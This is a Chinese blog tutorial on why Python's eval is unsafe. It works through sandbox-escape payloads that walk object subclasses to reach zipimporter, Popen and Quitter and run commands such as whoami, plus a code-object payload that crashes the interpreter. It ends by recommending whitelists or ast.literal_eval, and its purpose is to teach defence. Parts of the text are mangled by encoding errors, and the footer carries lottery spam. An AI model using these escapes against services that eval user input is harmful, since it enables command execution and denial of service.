1. python 为什么说eval要慎用

     更新时间:2019年03月26日 09:58:46   作者:风v月   我要评论

    这篇文章主要介绍了python 为什么说eval要慎用,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧

    eval前言

    In [1]: eval("2+3")
    Out[1]: 5
    
    In [2]: eval('[x for x in range(9)]')
    Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]
    

    当内存中的内置模块含有os的话,eval同样可以做到命令执行:

    In [3]: import os
    
    In [4]: eval("os.system('whoami')")
    hy-201707271917\administrator
    Out[4]: 0
    
    

    当然,eval只能执行Python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:

    In [8]: eval("__import__('os').system('whoami')")
    hy-201707271917\administrator
    Out[8]: 0
    

    在?#23548;?#30340;代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器?#35828;?#24448;往只需要调用用户在客户端选择的爬虫类型,并通过后?#35828;膃xec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成?#29616;?#30340;安全漏?#30784;?/p>

    安全”使用eval

    现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:

    Eval函数的声明为eval(expression[, globals[, locals]])

    其中,第二三个参数?#30452;?#25351;定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。

    >>> import os
    >>> 'os' in globals()
    True
    >>> eval('os.system('whoami')')
    win-20140812chjadministrator
    0
    >>> eval('os.system('whoami')',{},{})
    Traceback (most recent call last):
     File "", line 1, in 
     File "", line 1, in 
    NameError: name 'os' is not defined
    

    如果指定只允许调用abs函数,可以使用下面的写法:

    >>> eval('abs(-20)',{'abs':abs},{'abs':abs})
    20
    >>> eval('os.system('whoami')',{'abs':abs},{'abs':abs})
    Traceback (most recent call last):
     File "", line 1, in 
     File "", line 1, in 
    NameError: name 'os' is not defined
    >>> eval('os.system('whoami')')
    win-20140812chjadministrator
    0
    

    使用这种方法来防护,确实可以起到一定的作用,但是,这?#25191;?#29702;方法可能会被绕过,从而造成其他问题!

    绕过执行代码1

    被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行?#25105;?#20195;码:

    env = {}
    env["locals"] = None
    env["globals"] = None
    env["__name__"] = None
    env["__file__"] = None
    env["__builtins__"] = None
     
    eval(users_str, env)
    
    

    Python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,?#38469;?#22312;该模块中以?#20540;?#30340;方式存储的,下面两?#20013;?#27861;是等价的:

    >>> __builtins__.abs(-20)
    20
    >>> abs(-20)
    20

    我们也可以自定义内置函数,并像使用Python中的内置函数一样使用它们:

    >>> def hello():
    ...  print 'shabi'
    >>> __builtin__.__dict__['say_hello'] = hello
    >>> say_hello()
    shabi
    

    小明将eval函数的作用域中的内置模块设置为None,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:

    >>> id(__builtins__)
    3549136
    >>> id(__builtin__)
    3549136
    

    根据乌云drops提到的方法,使用如下代码即可:

    [x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

    上面的代码首先利用__class__和__subclasses__动态加载了object对象,这?#19988;?#20026;eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实?#32622;?#20196;执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:

    >>> "os" in configobj.__dict__
    True
    >>> import urllib
    >>> "os" in urllib.__dict__
    True
    >>> import urllib2
    >>> "os" in urllib2.__dict__
    True
    >>> configobj.os.system("whoami")
    win-20140812chjadministrator
    0
    
    

     和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都?#23567;?如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:

    from setuptools import setup, find_packages

    然后执行:

    python setup.py bdist_egg
    

    就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:

    >>> env = {}
    >>> env["locals"] = None
    >>> env["globals"] = None
    >>> env["__name__"] = None
    >>> env["__file__"] = None
    >>> env["__builtins__"] = None
    >>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
    >>> eval(users_str, env)
    win-20140812chjadministrator
    0
    >>> eval(users_str, {}, {})
    win-20140812chjadministrator
    0
    

    拒绝服务攻击1

    object的子类中有很多有趣的东西,执行以下代码查看:

    [x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

    这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,Quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类Quitter进行退出:

    >>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
     == 'Quitter'][0](0)()", {'__builtins__':None})
    

    C:/>

    如果运气好,遇到对方程序中导入了os等敏?#24515;?#22359;,那么Popen就可以用,并且绕过__builins__为空的限制,例子如下:

    >>> import subprocess
    >>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
     
    >>>
    正在 Ping 127.0.0.1 具有 32 字节的数据:
    来自 127.0.0.1 的回复: 字节=32 时间>>

    事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用。

    拒绝服务攻击2

    同样,我们甚至可以绕过__builtins__为None,造成一次拒绝服务攻击,Payload(来自老外blog)如下:

    >>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

    运行上面的代码,Python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是KABOOM,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不淫?#30784;?/p>

    总结

    从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比?#19979;櫸常?#21487;以使用ast.literal_eval代替不安全的eval。

    以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持脚本之家。

    相关文章

    最新评论

    山东群英会开奖查询
      1. 北京pk10稳赚攻略 双色球基本走势图带坐标 浙江快乐彩走势图今天手机版 体彩山西十一选五走势图彩票 陕西十一选五玩法技巧 四川快乐12中奖技巧 黄大仙码报今天晚上买什么平特一肖 老快3投注代购平台 世界杯法甲新闻 25选5 广西快三跨度走势图 大乐透走势图坐标版 通比牛牛群 陕西快乐10分预测 四川体彩高频新11选5